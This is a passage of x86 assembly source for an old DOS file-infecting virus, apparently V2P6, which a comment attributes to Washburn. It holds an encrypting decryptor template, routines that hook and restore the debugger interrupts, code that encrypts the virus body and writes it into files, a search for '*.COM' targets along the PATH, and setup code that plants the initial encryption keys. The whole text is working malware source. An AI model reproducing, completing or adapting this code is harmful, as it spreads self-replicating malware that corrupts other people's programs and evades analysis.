|
|||
|
SUB AX,093H
|
|||
|
CLI
|
|||
|
MOV DS:WORD PTR[000CH],AX
|
|||
|
MOV AX,WORD PTR[BP-014H]
|
|||
|
SUB AX,06DH
|
|||
|
MOV DS:WORD PTR[0004],AX
|
|||
|
PUSH CS
|
|||
|
POP AX
|
|||
|
MOV DS:WORD PTR[0006],AX
|
|||
|
MOV DS:WORD PTR[000EH],AX
|
|||
|
STI
|
|||
|
POP AX
|
|||
|
POP DS
|
|||
|
POPF
|
|||
|
RET
|
|||
|
|
|||
|
RESTORE_ONE_AND_THREE:
|
|||
|
PUSHF
|
|||
|
PUSH DS
|
|||
|
PUSH AX
|
|||
|
MOV AX,0
|
|||
|
PUSH AX
|
|||
|
POP DS
|
|||
|
MOV AX,WORD PTR[BP-024H]
|
|||
|
CLI
|
|||
|
MOV DS:WORD PTR[000CH],AX
|
|||
|
MOV AX,WORD PTR[BP-028H]
|
|||
|
MOV DS:WORD PTR[0004],AX
|
|||
|
MOV AX,WORD PTR[BP-026H]
|
|||
|
MOV DS:WORD PTR[0006],AX
|
|||
|
MOV AX,WORD PTR[BP-022H]
|
|||
|
MOV DS:WORD PTR[000EH],AX
|
|||
|
STI
|
|||
|
POP AX
|
|||
|
POP DS
|
|||
|
POPF
|
|||
|
RET
|
|||
|
|
|||
|
;============= The Variable Code ===============
|
|||
|
|
|||
|
VARIABLE_CODE:
|
|||
|
MOV SI,0
|
|||
|
MOV CX,0
|
|||
|
MOV DX,0
|
|||
|
NOP
|
|||
|
CLC
|
|||
|
STC
|
|||
|
CLD
|
|||
|
XOR BP,BP
|
|||
|
|
|||
|
XORING_HERE:
|
|||
|
XOR WORD PTR[BP+SI],DX
|
|||
|
ADD BYTE PTR[BX+SI],AL
|
|||
|
STC
|
|||
|
CMC
|
|||
|
CLC
|
|||
|
CLD
|
|||
|
STI
|
|||
|
NOP
|
|||
|
CLC
|
|||
|
INC SI
|
|||
|
DEC DX
|
|||
|
CLD
|
|||
|
CMC
|
|||
|
STI
|
|||
|
CLC
|
|||
|
STC
|
|||
|
NOP
|
|||
|
LOOP XORING_HERE
|
|||
|
XOR BP,BP
|
|||
|
XOR BX,BX
|
|||
|
XOR DI,DI
|
|||
|
XOR SI,SI
|
|||
|
ADD AX,WORD PTR[BX+SI]
|
|||
|
ADD AX,WORD PTR[BP+DI]
|
|||
|
ADD AX,DS:WORD PTR[0901H]
|
|||
|
ADD WORD PTR[BP+SI],CX
|
|||
|
ADD WORD PTR[BP+DI],CX
|
|||
|
ADD WORD PTR[SI],CX
|
|||
|
ADD CL,BYTE PTR[DI]
|
|||
|
ADD CL,BYTE PTR[BX]
|
|||
|
ADD WORD PTR[BP+DI],DX
|
|||
|
ADD WORD PTR[SI],DX
|
|||
|
ADD WORD PTR[DI],DX
|
|||
|
ADD DS:WORD PTR[01701H],DX
|
|||
|
ADD WORD PTR[BX+SI],BX
|
|||
|
ADD WORD PTR[BX+DI],BX
|
|||
|
ADD WORD PTR[BP+SI],BX
|
|||
|
ADD WORD PTR[BP+DI],BX
|
|||
|
ADD WORD PTR[SI],BX
|
|||
|
ADD WORD PTR[DI],BX
|
|||
|
ADD DS:WORD PTR[01F01H],BX
|
|||
|
ADD WORD PTR[BX+SI],SP
|
|||
|
ADD WORD PTR[BX+DI],SP
|
|||
|
ADD BYTE PTR[BP+SI],CL
|
|||
|
ADD DS:WORD PTR[0902H],AX
|
|||
|
ADD AX,WORD PTR[DI]
|
|||
|
ADD AL,8
|
|||
|
ADD AX,0704H
|
|||
|
ADD CL,BYTE PTR[DI]
|
|||
|
DEC BP
|
|||
|
INC BP
|
|||
|
MOV BP,04B0BH
|
|||
|
INC BX
|
|||
|
MOV BX,04F0FH
|
|||
|
INC DI
|
|||
|
MOV DI,04E0EH
|
|||
|
INC SI
|
|||
|
MOV SI,04808H
|
|||
|
INC AX
|
|||
|
MOV AX,04800H
|
|||
|
INC AX
|
|||
|
MOV AX,04804H
|
|||
|
INC AX
|
|||
|
MOV AX,04A0AH
|
|||
|
INC DX
|
|||
|
MOV DX,04A02H
|
|||
|
INC DX
|
|||
|
MOV DX,04A06H
|
|||
|
INC DX
|
|||
|
MOV DX,9
|
|||
|
ADD BYTE PTR[BX+SI],AL
|
|||
|
ADD WORD PTR[BX+SI],AX
|
|||
|
ADD BYTE PTR[BX+SI],AL
|
|||
|
ADD AX,0
|
|||
|
DB 0
|
|||
|
|
|||
|
;======= Only the Memory Image of the following code =====
|
|||
|
;======= is ever executed =====
|
|||
|
|
|||
|
ENCRYPT_WRITE_AND_DECRYPT:
|
|||
|
MOV CX,WORD PTR[BP-018H]
|
|||
|
MOV AX,WORD PTR[BP-016H]
|
|||
|
MOV DI,SI
|
|||
|
SUB DI,05A6H
|
|||
|
CALL ENCRYPT_BODY
|
|||
|
MOV AH,040H
|
|||
|
MOV DX,WORD PTR[BP-01EH]
|
|||
|
AND DX,0FFH
|
|||
|
MOV CX,WORD PTR[BP-018H]
|
|||
|
ADD CX,[O27H]
|
|||
|
ADD CX,DX
|
|||
|
MOV DX,SI
|
|||
|
SUB DX,05CDH
|
|||
|
INT 021H
|
|||
|
PUSHF
|
|||
|
PUSH AX
|
|||
|
MOV CX,WORD PTR[BP-018H]
|
|||
|
MOV AX,WORD PTR[BP-016H]
|
|||
|
MOV DI,SI
|
|||
|
SUB DI,05A6H
|
|||
|
CALL ENCRYPT_BODY
|
|||
|
POP AX
|
|||
|
POPF
|
|||
|
RET
|
|||
|
|
|||
|
ENCRYPT_BODY:
|
|||
|
XOR WORD PTR[DI],AX
|
|||
|
DEC AX
|
|||
|
INC DI
|
|||
|
LOOP ENCRYPT_BODY
|
|||
|
RET
|
|||
|
|
|||
|
;================= Data Section begins here ===============
|
|||
|
|
|||
|
RANDOM_KEY:
|
|||
|
DB 006H, 02CH
|
|||
|
|
|||
|
STORAGE_OF_INITIAL_JUMP:
|
|||
|
DB 0E9H, 0FDH, 0FEH
|
|||
|
|
|||
|
NEW_JUMP_INSTRUCTION:
|
|||
|
DB 0E9H, 00, 00
|
|||
|
|
|||
|
FILE_SPEC:
|
|||
|
DB "*.COM", 00
|
|||
|
|
|||
|
OFFSET_OF_PATH:
|
|||
|
DB "PATH="
|
|||
|
|
|||
|
WORK_AREA:
|
|||
|
DB 64 DUP (0)
|
|||
|
|
|||
|
NEW_DTA:
|
|||
|
DB 30 DUP (0)
|
|||
|
|
|||
|
TARGET_FILE_NAME:
|
|||
|
DB 13 DUP (0)
|
|||
|
|
|||
|
;============ THE FOLLOWING IS NOT PART OF THE VIRUS =============
|
|||
|
; Needed to insert initial random encryption values, etc. for the
|
|||
|
; first time. Values used here may correspond to Washburn's original
|
|||
|
; values. They were obtained from a sample of V2P6 which might have
|
|||
|
; been an original compilation of the virus by its author.
|
|||
|
|
|||
|
INSERT_ENCRYPTION_TECHNIQUES:
|
|||
|
XOR BP,BP
|
|||
|
MOV BX,OFFSET TRANS_TABLE
|
|||
|
MOV SI,OFFSET START
|
|||
|
MOV DI,OFFSET REAL_NOPS
|
|||
|
MOV DX,OFFSET REAL_NOP
|
|||
|
INC DI
|
|||
|
ADD DX,3
|
|||
|
|
|||
|
SEARCH_FOR_NOPS:
|
|||
|
INC SI
|
|||
|
CMP SI,OFFSET EXIT
|
|||
|
JE ANOTHER_RET
|
|||
|
CMP SI,DI
|
|||
|
JE LEAVE_IN
|
|||
|
CMP SI,DX
|
|||
|
JE LEAVE_IN
|
|||
|
CMP WORD PTR[SI],09090H
|
|||
|
JNE SEARCH_FOR_NOPS
|
|||
|
CALL INSERT_BREAKPOINT_AND_XORING_VALUE
|
|||
|
LEAVE_IN:
|
|||
|
JMP SHORT SEARCH_FOR_NOPS
|
|||
|
|
|||
|
INSERT_BREAKPOINT_AND_XORING_VALUE:
|
|||
|
MOV BYTE PTR[SI],0CCH
|
|||
|
MOV AX,BP
|
|||
|
XLATB
|
|||
|
MOV BYTE PTR[SI+1],AL
|
|||
|
XOR BYTE PTR[SI+2],AL
|
|||
|
INC BP
|
|||
|
ANOTHER_RET:
|
|||
|
RET
|
|||
|
|
|||
|
TRANS_TABLE:
|
|||
|
DB 08BH, 060H, 0D4H, 0C6H, 048H, 057H, 016H, 06EH
|
|||
|
DB 0D3H, 087H, 080H, 000H, 090H, 07EH, 051H, 056H
|
|||
|
DB 056H, 0F6H, 062H, 074H, 072H, 072H, 032H, 00AH
|
|||
|
DB 0AFH, 03BH, 0AAH, 0BBH, 0FAH, 041H, 038H, 009H
|
|||
|
DB 02FH, 0ABH, 0DCH, 0E5H, 004H, 010H, 08EH, 01FH
|
|||
|
DB 00DH, 04FH, 0F7H, 002H, 0F0H, 002H, 050H, 036H
|
|||
|
DB 04AH, 037H, 04AH, 077H, 0B2H, 07AH, 0B1H, 07AH
|
|||
|
DB 031H
|
|||
|
|
|||
|
O10H EQU 010H
|
|||
|
O3CH EQU 03CH
|
|||
|
ODH EQU 0DH
|
|||
|
OFH EQU 0FH
|
|||
|
O1BH EQU 01BH
|
|||
|
O6 EQU 06
|
|||
|
O1AH EQU 01AH
|
|||
|
O4 EQU 04
|
|||
|
O7 EQU 07
|
|||
|
O5CH EQU 05CH
|
|||
|
O24H EQU 024H
|
|||
|
O6AH EQU 06AH
|
|||
|
O1 EQU 01
|
|||
|
O2CH EQU 02CH
|
|||
|
OO10H EQU 0010H
|
|||
|
O22H EQU 022H
|
|||
|
O27H EQU 027H
|
|||
|
ZERO EQU 0
|
|||
|
|
|||
|
|
|||
|
V2P6 ENDP
|
|||
|
CODE_SEG ENDS
|
|||
|
END V2P6
|
|||
|
|